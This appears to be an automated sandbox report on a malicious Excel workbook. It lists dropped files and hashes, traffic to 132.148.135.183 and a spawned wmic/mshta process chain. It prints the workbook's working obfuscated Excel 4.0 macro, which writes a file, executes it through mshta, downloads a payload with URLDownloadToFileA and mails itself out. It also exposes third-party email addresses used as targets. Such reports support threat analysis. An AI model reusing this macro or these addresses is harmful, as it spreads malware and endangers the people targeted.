                    Preview: .PNG........IHDR.......Q.....s..6...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24CEB6FE.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 278 x 51, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2950
                    Entropy (8bit):7.8993383935684
                    Encrypted:false
                    SSDEEP:48:pdl8xfFpaj4hgHQd6xlWbrqtDhOjawI7rU/3e6U0N+mfNRimNwzie2/+dDl8o1XL:bILQxzWbrqt4jF8rU/3o0N+iTimmme28
                    MD5:162B885B4AA33B3E6B1DFDC5E55D12BC
                    SHA1:7AFCD5BDE19196181500267EE16EEA3F935462B2
                    SHA-256:F3002A1F5DC4EB3CC538F0D412601060642622D462E34ABDE2CFCC415886B2E5
                    SHA-512:53DD1948812484123DE7E4B58CA21362C4834784470447CF34D46207072CE2C6170747373E16748E2835ABA4B666E731C87739718BB3FCE0AAC09C091E7B7472
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR.......3......9.)...MIDATx..yTSW..Y....@X....B..h.w-Zm-...i..t.x.8.G;.qj....K..f...K.VK.q.U. P.DA.RC..d.?.y}%!.y...9.s........~........o|.(.....k.(..o..(.NP.Q(....P8A%D.p.J.B.......*!...TB..'..(.NP.Q(....P8A%D.p.J.B.......*!...TB..'..(.N..nq.....)...w..........f.......1.K.3C...]|...UY.......]....4-.@....^c.~w...?.@.g.]}k......o.4...\...|.p.e.s..F.$..fu......K..c..c....Z...J..\.......t.-.."E.....6.n.j%8ZM...s4.j..y....p..7.>|g.OBR.Yt.@g].W.g.{8Ngg..8@:mF.?...)ic./.H..>b.A..mmn*.......}V.........gI#4u..f...&....X}..W.......;b4.....d../n....<....E.O.lxY.<.../.I..Q..\...U...._ ....O..`.....6_(...F........bV$.N..f{fw.6..V...<A....y.....P*...."..+$,rN.........B....f.x...".......$&.=..4..j..eG..=<F?..@U..C...Te.......F%.p.%.`.!... ps.......K:.....Bw..........,..`OKS.......{.y.........H....xZ.6.<..5/(s.......g.......S^!a<.`../.\..h......5?4-.......x../..v...B.......zz..z4...8...........c.Y....n.8..T.."...EK-.....E...%.iT

                    C:\Users\user\AppData\Local\Temp\53F9.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):78351
                    Entropy (8bit):7.879030441592837
                    Encrypted:false
                    SSDEEP:1536:e7zFXeInKIdwEGeamaBt30SKZPuALLImemeKHqeK7Ync6rW1dEmH:e7zFPn/doehaj3980XKUYVrW1dHH
                    MD5:BA0491A55B33864803032FAD85791095
                    SHA1:6B7B54BF3D16DF552E720E41EC88E1449FBDA792
                    SHA-256:FEA78088764EF8A7FC83D53C80FB6A728CD0411087308E6B4892D38A83DA818D
                    SHA-512:DC40F55BD77FDDF51D5E5C9DBAFBD78FF4C233933FC87B61A2EBE02CEF0CDFAB12DF8BC0E12E2041FE00F1934F3B56350A504BD8CF10A403592568CE714B066C
                    Malicious:false
                    Reputation:low
                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....

                    C:\Users\user\Desktop\~$Offer-04563360.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.85423685323248
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:Offer-04563360.xlsb
                    File size:77958
                    MD5:5b3a5c210da6c92ad1b28c057fb33808
                    SHA1:922822e5c237a2c3006b2caea28936d5d9382943
                    SHA256:69fe1bc03e4fc0a7c9ca0466cb3cc352c7446b27a4ddb466ba93aeae4fbac7df
                    SHA512:31e55629d403c3f92660e06e3470a1d0bf01c65299cad4df77b0b56a4889c9bb092aff837cf26044f49f5ec393a729d2a3dc654502463f53f18b69ad6b70a693
                    SSDEEP:1536:UWpPuALLImemeKHqeK7YncyUojd+8x4vgogK5R9YSKpfgdWIHmd:VI80XKUYMQd+8x4YofbyfgdWIHmd
                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "Offer-04563360.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN("C:\Program" & CHAR(68) & "ata\r" & CHAR(67) & "Vu" & CHAR(121) & ".rt" & CHAR(102), 3)
                    1,564,=D9082+A2550
                    2,564,=A3096+A9582
                    3,564,=C9783+C2179
                    4,564,=B6438+B991
                    5,564,=D7717+D7525
                    6,564,=B7618+D3913
                    7,564,=D2283+A5996
                    8,564,=A4200+B6655
                    10,564,=A7769+D4208
                    12,564,=FOR.CELL("mpVUGcDFesvjAm",Sheet1!CK156:CK4873, TRUE)
                    14,564,=C2934+A8639
                    15,564,=A894+D2355
                    16,564,=A9966+B9088
                    18,564,=D921+D9175
                    21,564,=B52+D2453
                    22,564,=C729+D3605
                    24,564,=C8033+D5803
                    25,564,=FWRITE(0,CHAR(mpVUGcDFesvjAm))
                    27,564,=A8901+D6501
                    28,564,=B6409+D6362
                    29,564,=B7705+C7748
                    30,564,=D2230+A8245
                    33,564,=C4561+B6617
                    35,564,=B8317+A4072
                    36,564,=A7253+C1791
                    37,564,=C1090+D2122
                    38,564,=NEXT()
                    39,564,=A9569+A4208
                    42,564,=A2+C1566
                    46,564,=A931+A4803
                    48,564,=B5053+B6657
                    50,564,=B1626+A8015
                    52,564,=C4515+A8066
                    53,564,=EXEC("wmic" & CHAR(32) & CHAR(112) & "rocess " & CHAR(99) & "all create " & CHAR(34) & "mshta C:\ProgramDat" & CHAR(97) & "\rCVuy.rtf" & CHAR(34) & "")
                    54,564,=D8295+B2848
                    57,564,=C3793+A9010
                    59,564,=D5223+D2211
                    60,564,=A4777+C3525
                    61,564,=B4919+A6540
                    62,564,=D7823+A7515
                    64,564,=D2077+B8429
                    65,564,=B744+A805
                    66,564,=CALL("ur" & CHAR(108) & CHAR(109) & "" & CHAR(111) & CHAR(110) & "", "URLD" & CHAR(111) & CHAR(119) & "" & CHAR(110) & "loa" & CHAR(100) & "ToFile" & CHAR(65),CHAR(74) & "JCCJJ", 0, CHAR(104) & "ttp://" & CHAR(49) & "32.148." & CHAR(49) & CHAR(51) & CHAR(53) & ".183:8" & CHAR(48) & "80/" & CHAR(81) & "2W5VWU" & CHAR(70) & "L5VCMQ7JQP" & CHAR(69) & "TG3CC" & CHAR(84) & "YX72Z4" & CHAR(82) & "25" & CHAR(80) & "DG", "C:\ProgramDat" & CHAR(97) & "\AgMsUNfeoa" & CHAR(80) & "T.txt",0,0)
                    68,564,=B1010+B6784
                    69,564,=D655+B3280
                    72,564,=B2993+A5098
                    73,564,=B896+C6748
                    74,564,=C5684+C3601
                    78,564,=A3740+B9166
                    79,564,=ALERT("Err" & CHAR(111) & CHAR(114) & "! Se" & CHAR(110) & "ding r" & CHAR(101) & CHAR(112) & "or" & CHAR(116) & "" & CHAR(32) & "to Mi" & CHAR(99) & "ros" & CHAR(111) & "ft.." & CHAR(46))
                    81,564,=A3171+A7979
                    84,564,=D4977+C7229
                    85,564,=D2360+D5867
                    91,564,=C3857+A1301
                    92,564,=C1995+B8160
                    93,564,=FOPEN("C:" & CHAR(92) & CHAR(80) & "rog" & CHAR(114) & "amD" & CHAR(97) & "ta\Ag" & CHAR(77) & "sUNfeoaPT.tx" & CHAR(116) & "",1)
                    97,564,=A9199+C5546
                    99,564,=C2336+B27
                    100,564,=A2304+D20
                    103,564,=SEND.MAIL(EVALUATE(FREAD(US94,255)))
                    107,564,=A5943+C1177
                    110,564,=B8064+B5706
                    111,564,=A7705+A4591
                    112,564,=D1667+A1193
                    113,564,=B8485+C9974
                    114,564,=A8467+C5641
                    115,564,=RETURN()
                    

                    Network Behavior

                    TCP Packets

                    Timestamp                           | Source Port | Dest Port | Source IP       | Dest IP
                    Nov 24, 2021 17:24:44.483208895 CET | 49167       | 8080      | 192.168.2.22    | 132.148.135.183
                    Nov 24, 2021 17:24:44.640537024 CET | 8080        | 49167     | 132.148.135.183 | 192.168.2.22
                    Nov 24, 2021 17:24:44.640707016 CET | 49167       | 8080      | 192.168.2.22    | 132.148.135.183
                    Nov 24, 2021 17:24:44.641439915 CET | 49167       | 8080      | 192.168.2.22    | 132.148.135.183
                    Nov 24, 2021 17:24:44.799077988 CET | 8080        | 49167     | 132.148.135.183 | 192.168.2.22
                    Nov 24, 2021 17:24:45.082377911 CET | 8080        | 49167     | 132.148.135.183 | 192.168.2.22
                    Nov 24, 2021 17:24:45.082562923 CET | 49167       | 8080      | 192.168.2.22    | 132.148.135.183
                    Nov 24, 2021 17:26:00.083129883 CET | 8080        | 49167     | 132.148.135.183 | 192.168.2.22
                    Nov 24, 2021 17:26:00.083239079 CET | 49167       | 8080      | 192.168.2.22    | 132.148.135.183

                    HTTP Request Dependency Graph

                    • 132.148.135.183:8080

                    HTTP Packets

                    Session ID | Source IP    | Source Port | Destination IP  | Destination Port | Process
                    0          | 192.168.2.22 | 49167       | 132.148.135.183 | 8080             | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                    Timestamp                           | kBytes transferred | Direction | Data
                    Nov 24, 2021 17:24:44.641439915 CET | 0                  | OUT       | GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 132.148.135.183:8080
                    Connection: Keep-Alive
                    Nov 24, 2021 17:24:45.082377911 CET | 0                  | IN        | HTTP/1.1 200 OK
                    Server: nginx/1.0.15
                    Date: Wed, 24 Nov 2021 16:24:45 GMT
                    Content-Type: text/plain; charset=utf-8
                    Connection: keep-alive
                    Content-Length: 128
                    Data Raw: 7b 22 61 66 65 72 6e 61 6e 64 65 7a 40 63 61 70 65 6c 2d 76 69 6e 6f 73 2e 65 73 22 2c 22 73 68 65 72 40 73 6d 6c 63 6f 6e 73 75 6c 74 61 6e 74 73 2e 63 61 22 2c 22 63 6f 6c 69 6e 66 69 73 68 40 74 6d 73 2d 75 6b 2e 6e 65 74 22 2c 22 69 6e 66 6f 40 64 6f 6c 70 68 69 6e 2d 69 6e 6e 6f 76 61 74 69 6f 6e 73 2e 64 65 22 2c 22 73 68 61 72 6f 6e 40 76 69 73 61 73 6b 6b 2e 63 6f 6d 22 7d
                    Data Ascii: {"afernandez@capel-vinos.es","sher@smlconsultants.ca","colinfish@tms-uk.net","info@dolphin-innovations.de","sharon@visaskk.com"}


                    System Behavior

                    General

                    Start time:17:24:20
                    Start date:24/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f2d0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:24:43
                    Start date:24/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\rCVuy.rtf"
                    Imagebase:0xff020000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:17:24:44
                    Start date:24/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\rCVuy.rtf
                    Imagebase:0x13ff10000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
